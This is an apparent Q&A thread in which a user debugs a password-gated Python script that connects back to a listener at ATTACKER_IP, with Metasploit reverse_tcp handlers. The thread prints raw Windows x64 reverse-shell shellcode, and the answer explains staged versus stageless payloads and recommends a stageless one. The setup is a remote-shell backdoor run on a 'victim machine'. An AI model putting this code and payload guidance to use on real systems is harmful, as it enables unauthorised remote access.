
When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions.

When attempting to replicate this in metasploit I use set payload windows/x64/shell/reverse_tcp then I set the LHOST and LPORT and run the script on the victim machine. The connection establishes, but right after receiving Login: on my end, I get the error below.

I did some research and I think some bytes should be excluded such as the null ones but I am unsure if this is the issue or the correct way to fix the issue. One thing I am confused by is why pwd receives anything if the script crashes before I have inputted the password.

When trying print(pwd) before decode:

b'P\x01\x00\x00'
b'\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]I\xb8cmd\x00\x00\x00\x00\x00APAPH\x89\xe2WWWM1\xc0j\rYAP\xe2\xfcf\xc7D$T\x01\x01H\x8dD$\x18\xc6\x00hH\x89\xe6VPAPAPAPI\xff\xc0API\xff\xc8M\x89\xc1L\x89\xc1A\xbay\xcc?\x86\xff\xd5H1\xd2H\xff\xca\x8b\x0eA\xba\x08\x87\x1d`\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5'

errors:

Traceback (most recent call last):
  File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 87, in <module>
    Login()
  File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 37, in Login
    pwd = pwd.decode("utf-8").strip()
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte

code snippet:

import socket

host = "ATTACKER_IP"   # placeholder for the listener address (not given in the question)
port = 4444            # same port as the netcat listener used in the question
passwd = "Anything"

def Login():
    global s
    while True:
        string1 = "Login: "
        string1 = string1.encode("utf-8")
        s.send(string1)
        pwd = s.recv(1024)
        # raises UnicodeDecodeError when the peer sends non-UTF-8 bytes (see traceback)
        pwd = pwd.decode("utf-8")

        if pwd.strip() == passwd:
            break
        else:
            continue

    string2 = "You are connected! "
    string2 = string2.encode("utf-8")
    s.send(string2)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
Login()


1 Answer

I believe the payload you are setting up in the metasploit handler is a staged payload (more info: https://metasploit.help.rapid7.com/docs/working-with-payloads). This means that the Python script is receiving the final stage but does not know how to handle it and, thus, crashing.

Try doing the same thing, but using a stageless payload such as windows/x64/shell_reverse_tcp instead and see if it works.

zyk
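To see why pwd receives something before anyone types a password, here is an added example (not the asker's script or the answerer's code) that replays the question's Login() loop over pre-recorded recv() results. A staged reverse_tcp handler first sends a 4-byte little-endian stage length (b'P\x01\x00\x00' is 0x150, i.e. 336 bytes), which decodes fine and just fails the comparison, and then the stage itself, whose first byte 0xfc is not valid UTF-8. The function names and the truncated sample chunks are assumptions for illustration.

```python
import struct

PASSWORD = "Anything"  # same placeholder password as in the question

# Constructed samples of what successive recv() calls return.
# Staged handler: 4-byte length prefix, then the stage (only the first few
# bytes of the stage from the question's dump are reproduced here).
STAGED_HANDLER_CHUNKS = [b"P\x01\x00\x00", b"\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00"]
# A person at a terminal: one wrong guess, then the right password.
HUMAN_CHUNKS = [b"wrong\r\n", b"Anything\r\n"]


def looks_like_text(chunk: bytes):
    """Return the typed line (without the trailing newline) if the chunk is
    printable UTF-8 text, otherwise None."""
    try:
        text = chunk.decode("utf-8")
    except UnicodeDecodeError:
        return None
    body = text.rstrip("\r\n")
    if body and all(c.isprintable() for c in body):
        return body
    return None


def login(chunks, password=PASSWORD):
    """Replay the Login() loop. Returns ('ok', attempts) on a correct password,
    ('closed', None) if the input runs out, or ('not_a_terminal', reason)
    when the peer sends bytes nobody typed (e.g. a staged payload's stage)."""
    stage_len = None
    for attempts, chunk in enumerate(chunks, 1):
        text = looks_like_text(chunk)
        if text is not None:
            if text == password:
                return ("ok", attempts)
            continue
        # First non-text chunk of exactly 4 bytes: treat as a length prefix.
        if stage_len is None and len(chunk) == 4:
            stage_len = struct.unpack("<I", chunk)[0]
            continue
        if stage_len is not None:
            return ("not_a_terminal",
                    f"binary data after a {stage_len}-byte length prefix (staged payload?)")
        return ("not_a_terminal", "undecodable bytes")
    return ("closed", None)


if __name__ == "__main__":
    print(login(HUMAN_CHUNKS))
    print(login(STAGED_HANDLER_CHUNKS))
```

The real script should still fall back to a graceful close on "not_a_terminal" instead of raising, so an unexpected peer does not crash it.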
  • Thanks for the input, I'll give it a go – Volapiik Vyrient May 25 '20 at 17:36
  • After testing it seems no error pops up and on the receiving end I get up to "Command shell session 1 opened at 2020-05-26 02:10:57 -0400 ". However, nothing seems to happen afterwards, the prompt to login fails to appear and nothing else happens until I close the connection. – Volapiik Vyrient May 26 '20 at 06:16
  • I tested your snippet on my Kali box using the `linux/x64/shell_reverse_tcp` payload within the `multi/handler` module and did get the "Login" prompt as expected (need to press enter to get it though). Once I entered the correct password the session ends (same behaviour as when tested using a simple netcat listener). – zyk May 26 '20 at 18:55
  • Thanks for getting back to me, I'll give it another go and let you know how it goes (sorry for the slow updates, college getting in the way). I was wondering, do you think it would help if I gave you the full script? Not sure if the rest of my code impacts the connection in some way. – Volapiik Vyrient May 27 '20 at 17:19
  • I feel so stupid.....I followed your instructions, and turns out as I mentioned before at first nothing happens, but I pressed enter like you said and voila! the login prompt appears. Thanks for sticking with me throughout this! – Volapiik Vyrient May 28 '20 at 04:34
  • Been there, done that :) It happens even to the best of us. Glad you managed in the end. – zyk May 28 '20 at 15:29